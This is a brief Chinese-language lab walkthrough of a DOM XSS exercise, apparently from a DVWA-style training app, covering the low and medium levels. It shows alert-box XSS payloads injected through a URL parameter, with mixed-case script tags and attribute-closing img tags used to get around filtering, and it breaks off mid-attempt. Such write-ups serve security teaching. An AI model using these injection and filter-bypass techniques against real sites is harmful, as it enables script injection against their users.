XSS(DOM)
LOW
这个难度极其简单,直接url注入一个scrip的命令
?default=<script>alert('hacked')</script>
medium
首先,用low的情况加个大小写混写,看看情况。
?default=<scrIPT>alert("hack")</SCRipt>
结果:
结果直接把我的代码给去掉了,再猜一下别的代码。
?default=<img src=0 "alert('hacked')"/>
结果:
看来,应该是将script过滤了,但是并未弹窗,让我看一下代码。
可以看出,输入的命令被包含到了value中,那就把value闭合一下看看。
?default="><img src=0 "alert('hacked')"/>
仍未弹窗,看一下情况